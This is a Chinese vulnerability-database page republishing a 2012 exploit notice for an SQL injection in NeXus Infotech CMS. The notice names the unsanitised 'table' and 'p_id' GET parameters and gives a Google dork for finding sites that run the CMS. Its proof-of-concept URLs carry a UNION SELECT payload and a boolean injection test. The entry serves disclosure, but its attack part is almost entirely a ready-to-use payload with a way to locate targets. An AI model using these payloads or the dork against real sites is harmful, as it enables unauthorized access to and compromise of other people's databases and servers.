NeXus Infotech CMS SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047502 漏洞类型
发布时间 2012-05-08 更新时间 2012-05-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012050060
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#  Exploit title : NeXus Infotech CMS SQL Injection Vulnerability
#  Date : May 05,2012
#  Author : gr00ve_hack3r
#  Contact : groove.hacker7/a/t/gmail.com
#  Homepage : www.gr00ve-hack3r.com
#  Vendor : NeXus Infotech
#  Vendor Site : http://www.nexusinfotech.org/
#  Google Dork : intext:"Powered By NeXus Infotech"

#  Vulnerability :

GET parameter " table " and " p_id " accept unsanitised user input and
result in SQL injection which can lead to server compromise

#  PoC Exploit :

[+] http://[host].com/index.php?pagename=photogallery&table=photogallery
UNION ALL SELECT 1, 1, CONCAT(CHAR(1),CHAR(1),CHAR(1))#
[+] http://www.[host].com/details.asp?p_id=1 AND 2=2